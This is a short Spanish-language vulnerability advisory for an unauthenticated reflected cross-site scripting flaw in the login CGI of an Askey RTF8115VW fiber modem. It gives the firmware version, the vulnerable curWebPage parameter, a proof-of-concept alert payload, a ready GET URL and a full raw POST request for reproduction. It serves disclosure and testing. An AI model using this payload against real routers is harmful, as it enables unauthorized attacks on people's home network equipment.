
XSS-Askey
Cross-Site Scripting no autenticado - Módem de fibra de Internet Askey
Fabricante: Askey
Versión de software: BR_SV_g11.11_RTF_TEF001_V6.54_V014
Modelo: RTF8115VW
Parámetro vulnerable: curWebPage
Payload: ";alert('xss')//
No probado en otros modelos/versiones.
Vía petición GET
En la petición de inicio de sesión podemos emitir una petición GET:
http://x.x.x.x/cgi-bin/te_acceso_router.cgi?curWebPage=/settings-internet.asp";alert('xss')//&loginUsername=admin&loginPassword=admin
Los parámetros de usuario y contraseña no necesitan ser válidos.

Vía petición POST
1) Configura tu proxy (Burp / ZAP / lo que sea) para interceptar la petición de inicio de sesión
2) Inserta el payload después de la página .asp utilizada por el parámetro curWebPage
3) Reenvía la petición
La petición final
POST /cgi-bin/te_acceso_router.cgi HTTP/1.1
Host: x.x.x.x
Origin: http://x.x.x.x
Cookie: _httpdSessionId_=ece9eb5b733f7cbc8198ce9b6ab995c2
Upgrade-Insecure-Requests: 1
Referer: http://x.x.x.x/login.asp
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
Content-Length: 35
curWebPage=%2Fsettings-firewall.asp+payload
<!---curWebPage=%2Fsettings-firewall.asp";alert('xss')//--->